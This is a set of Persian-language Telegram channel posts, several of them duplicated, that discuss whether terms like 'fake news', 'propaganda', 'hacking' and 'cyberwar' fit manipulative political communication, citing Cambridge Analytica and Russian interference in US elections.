اما استفاده از برچسب هایی مثل «جعلی» یا «دروغ» انگار عمق پیچیدگی ارتباطات دستکاری شده را نشان نمیدهد. «اخبار جعلی» همانطور که بسیاری اشاره کرده اند، همه چیز را بیش از حد به دوگانه درست/غلط تقلیل میدهد. همین موضوع در مورد مفهوم «دروغ سازها» هم صدق میکند.
آدم یاد شبکه عظیمی از رباتها و ترول ها می افتد که مدام دروغ میسازند. اگر واقعاً ارتباطات دستکاری شده فقط به معنی گفتن دروغ خالص بود، افشای دروغها و آشکار کردن حقیقت کار راحتی میبود. ولی با وجود این همه راستی آزمایی و افشاگر، باز هم دستکاری ادامه دارد.
علاوه بر این، تقسیم بندی صرف به درست/غلط خیلی وقتها به واقعیت ارتباطات دستکاری شده نمیخورد. مثلاً یک پیام برای برانگیختن حس همدلی تو، «دروغ» محسوب میشود؟ یک میم بامزه حتماً نادرسته؟ پست تبلیغاتی که دوستت هم آن را تأیید کرده، الزاماً غیرواقعی است؟
«پروپاگاندا» (تبلیغات سیاسی) هم واژه بدیهی برای این موقعیت به نظر میاد، حتی اگر معنای آن در طول سالها کمرنگ و مبهم شده باشد. یک کتاب جدید به نام «پروپاگاندای محاسباتی» سعی میکند این واژه را برای عصر دیجیتال بروزرسانی کند و کاربرد الگوریتم ها و خودکارسازی برای دستکاری ارتباطی را توضیح دهد. با این حال، پروپاگاندا که الان بیشتر «روابط عمومی» هم خوانده میشود فقط بخش جمعی ارتباطات را در ذهن مخاطب تداعی میکند. جالب اینکه یک پژوهش تازه با عنوان «پروپاگاندای شبکه ای» حتی دستکاری فرد به فرد را جدا از پروپاگاندا میداند، و بنابراین تعداد زیادی از تعاملات دستکاری شده شخصی که الان در شبکه های اجتماعی ممکن شده را کنار میگذارد.
واژهای که به هدف نزدیکتر است، شاید «هک کردن» باشد. بعد از انتخابات ۲۰۱۶ و در آستانه انتخابات ۲۰۲۰ آمریکا، عباراتی مثل «روس ها سعی دارند انتخابات را هک کنند» زیاد شنیده شد. اما این واژه هم کافی نیست؛ چون واژه «هک» ذهن آدم را میبرد سراغ یک فرد منزوی، با هودی، که بالای یک کیبورد شبتاب نشسته و به شدت مشغول هک کردن است...
خب دقیقاً چی را؟ ایمنی ماشین های رأی گیری دیجیتال مدتهاست دغدغه است، اما آنچه در ۲۰۱۶ و دوباره در ۲۰۲۰ رخ داد، در واقع ربطی به هک کردن ماشین های رأی نداشت هرچند تلاشهایی هم صورت گرفت. به همین دلیل، مفسران حالا عبارت «هک ذهنی» یا «هک شناختی» را استفاده میکنند. این توصیف به مفهوم مهندسی اجتماعی توده ای شخصی نزدیکتر است؛ برای نمونه، Cambridge Analytica مدعی بود که هزاران داده درباره هر رأی دهنده آمریکایی دارد و به همین دلیل میتواند اهرم های ذهنی ظریفی را شناسایی کند تا دیدگاه افراد را شکل دهد.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
اما استفاده از برچسب هایی مثل «جعلی» یا «دروغ» انگار عمق پیچیدگی ارتباطات دستکاری شده را نشان نمیدهد. «اخبار جعلی» همانطور که بسیاری اشاره کرده اند، همه چیز را بیش از حد به دوگانه درست/غلط تقلیل میدهد. همین موضوع در مورد مفهوم «دروغ سازها» هم صدق میکند.
آدم یاد شبکه عظیمی از رباتها و ترول ها می افتد که مدام دروغ میسازند. اگر واقعاً ارتباطات دستکاری شده فقط به معنی گفتن دروغ خالص بود، افشای دروغها و آشکار کردن حقیقت کار راحتی میبود. ولی با وجود این همه راستی آزمایی و افشاگر، باز هم دستکاری ادامه دارد.
علاوه بر این، تقسیم بندی صرف به درست/غلط خیلی وقتها به واقعیت ارتباطات دستکاری شده نمیخورد. مثلاً یک پیام برای برانگیختن حس همدلی تو، «دروغ» محسوب میشود؟ یک میم بامزه حتماً نادرسته؟ پست تبلیغاتی که دوستت هم آن را تأیید کرده، الزاماً غیرواقعی است؟
«پروپاگاندا» (تبلیغات سیاسی) هم واژه بدیهی برای این موقعیت به نظر میاد، حتی اگر معنای آن در طول سالها کمرنگ و مبهم شده باشد. یک کتاب جدید به نام «پروپاگاندای محاسباتی» سعی میکند این واژه را برای عصر دیجیتال بروزرسانی کند و کاربرد الگوریتم ها و خودکارسازی برای دستکاری ارتباطی را توضیح دهد. با این حال، پروپاگاندا که الان بیشتر «روابط عمومی» هم خوانده میشود فقط بخش جمعی ارتباطات را در ذهن مخاطب تداعی میکند. جالب اینکه یک پژوهش تازه با عنوان «پروپاگاندای شبکه ای» حتی دستکاری فرد به فرد را جدا از پروپاگاندا میداند، و بنابراین تعداد زیادی از تعاملات دستکاری شده شخصی که الان در شبکه های اجتماعی ممکن شده را کنار میگذارد.
واژهای که به هدف نزدیکتر است، شاید «هک کردن» باشد. بعد از انتخابات ۲۰۱۶ و در آستانه انتخابات ۲۰۲۰ آمریکا، عباراتی مثل «روس ها سعی دارند انتخابات را هک کنند» زیاد شنیده شد. اما این واژه هم کافی نیست؛ چون واژه «هک» ذهن آدم را میبرد سراغ یک فرد منزوی، با هودی، که بالای یک کیبورد شبتاب نشسته و به شدت مشغول هک کردن است...
خب دقیقاً چی را؟ ایمنی ماشین های رأی گیری دیجیتال مدتهاست دغدغه است، اما آنچه در ۲۰۱۶ و دوباره در ۲۰۲۰ رخ داد، در واقع ربطی به هک کردن ماشین های رأی نداشت هرچند تلاشهایی هم صورت گرفت. به همین دلیل، مفسران حالا عبارت «هک ذهنی» یا «هک شناختی» را استفاده میکنند. این توصیف به مفهوم مهندسی اجتماعی توده ای شخصی نزدیکتر است؛ برای نمونه، Cambridge Analytica مدعی بود که هزاران داده درباره هر رأی دهنده آمریکایی دارد و به همین دلیل میتواند اهرم های ذهنی ظریفی را شناسایی کند تا دیدگاه افراد را شکل دهد.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
حتی اگر Cambridge Analytica در مورد توانمندی هایش اغراق کرده باشد، این نوع هدف گیری خرد اکنون بخشی ثابت از ارتباطات سیاسی مدرن شده است.
با این حال، «هک» کردن هم واژهای بیش از حد ابزاری است. مثل «دروغ سازها»، این واژه هم همه چیز را خیلی دوگانه و ساده نشان میدهد؛ برای مثال، اگر یک هکر بدافزار دسترسی روت به کامپیوتر بگیرد یعنی کنترل کامل دارد، اما این تصور با دستکاری های ریز و پنهانی انتخابات ۲۰۱۶ و بعد از آن تطابق ندارد. هیچکس دسترسی روت به ذهن دیگران پیدا نمیکند حتی اگر هزاران داده از هر نفر داشته باشد، Cambridge Analytica هم نمیتوانست ذهن کسی را کاملاً کنترل کند. ارتباطات این فرایند شلوغ و اشتراکی ساختن واقعیت بین انسانها را نمیتوان فقط به یک استعاره رایانه ای تقلیل داد.
«جنگ سایبری» هم واژه دیگری است که مثلاً پژوهشگر حوزه ارتباطات، Kathleen Hall Jamieson، در عنوان کتابش از آن استفاده کرده: «جنگ سایبری: چگونه هکرها و ترول های روسی به انتخاب یک رئیس جمهور کمک کردند». جمیزون استدلال میکند چون فعالیت آژانس تحقیقات اینترنتی روسیه ازطرف یک دولت و علیه دولت دیگر (آمریکا) و با هدف دخالت در فرایند سیاسی بوده، این اقدام را باید نوعی عملیات جنگی بدانیم و واکنش متناسب نشان دهیم.
در نتیجه، برخلاف «هک کردن انتخابات» که ذهن را به سمت هکرهای جداگانه و دستکاری ماشینها یا افراد می برد، برداشت جمیزون بر ابعاد اجتماعی و سیاسی تأکید دارد و تداوم تلاش روسیه برای دخالت در بحث های دموکراتیک را یک مسئله کلان میبیند.
هرچند «جنگ سایبری» برای عملیات دولتی روسیه وسوسه برانگیز است، ما فکر میکنیم نه برای اقدامات روسیه و نه شرکت هایی مثل Cambridge Analytica واژه دقیقی نیست. ادعای اینکه عملیات سایبری روسیه در ۲۰۱۶ نوعی «جنگ» است، در حقوق و پژوهش های موجود درباره درگیری های سایبری پشتوانه محکمی ندارد. حتی اگر چنین برچسبی را برای اقدامات روسیه در انتخابات ۲۰۱۶، ۲۰۱۸ و ۲۰۲۰ بپذیریم، پس حملات مشابه Cambridge Analytica یا بازیگران داخلی را چه باید نامید؟ آیا شرکت مشاورهای مثل Cambridge Analytica که در نهایت توسط کمپین ترامپ استخدام شده بود یک بازیگر دولتی است؟ یا شرکت آمریکایی Phunware که با کمپین ترامپ ۲۰۲۰ همکاری داشت، واقعاً «جنگ» راه انداخته؟
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
حتی اگر Cambridge Analytica در مورد توانمندی هایش اغراق کرده باشد، این نوع هدف گیری خرد اکنون بخشی ثابت از ارتباطات سیاسی مدرن شده است.
با این حال، «هک» کردن هم واژهای بیش از حد ابزاری است. مثل «دروغ سازها»، این واژه هم همه چیز را خیلی دوگانه و ساده نشان میدهد؛ برای مثال، اگر یک هکر بدافزار دسترسی روت به کامپیوتر بگیرد یعنی کنترل کامل دارد، اما این تصور با دستکاری های ریز و پنهانی انتخابات ۲۰۱۶ و بعد از آن تطابق ندارد. هیچکس دسترسی روت به ذهن دیگران پیدا نمیکند حتی اگر هزاران داده از هر نفر داشته باشد، Cambridge Analytica هم نمیتوانست ذهن کسی را کاملاً کنترل کند. ارتباطات این فرایند شلوغ و اشتراکی ساختن واقعیت بین انسانها را نمیتوان فقط به یک استعاره رایانه ای تقلیل داد.
«جنگ سایبری» هم واژه دیگری است که مثلاً پژوهشگر حوزه ارتباطات، Kathleen Hall Jamieson، در عنوان کتابش از آن استفاده کرده: «جنگ سایبری: چگونه هکرها و ترول های روسی به انتخاب یک رئیس جمهور کمک کردند». جمیزون استدلال میکند چون فعالیت آژانس تحقیقات اینترنتی روسیه ازطرف یک دولت و علیه دولت دیگر (آمریکا) و با هدف دخالت در فرایند سیاسی بوده، این اقدام را باید نوعی عملیات جنگی بدانیم و واکنش متناسب نشان دهیم.
در نتیجه، برخلاف «هک کردن انتخابات» که ذهن را به سمت هکرهای جداگانه و دستکاری ماشینها یا افراد می برد، برداشت جمیزون بر ابعاد اجتماعی و سیاسی تأکید دارد و تداوم تلاش روسیه برای دخالت در بحث های دموکراتیک را یک مسئله کلان میبیند.
هرچند «جنگ سایبری» برای عملیات دولتی روسیه وسوسه برانگیز است، ما فکر میکنیم نه برای اقدامات روسیه و نه شرکت هایی مثل Cambridge Analytica واژه دقیقی نیست. ادعای اینکه عملیات سایبری روسیه در ۲۰۱۶ نوعی «جنگ» است، در حقوق و پژوهش های موجود درباره درگیری های سایبری پشتوانه محکمی ندارد. حتی اگر چنین برچسبی را برای اقدامات روسیه در انتخابات ۲۰۱۶، ۲۰۱۸ و ۲۰۲۰ بپذیریم، پس حملات مشابه Cambridge Analytica یا بازیگران داخلی را چه باید نامید؟ آیا شرکت مشاورهای مثل Cambridge Analytica که در نهایت توسط کمپین ترامپ استخدام شده بود یک بازیگر دولتی است؟ یا شرکت آمریکایی Phunware که با کمپین ترامپ ۲۰۲۰ همکاری داشت، واقعاً «جنگ» راه انداخته؟
@TryHackBoxStory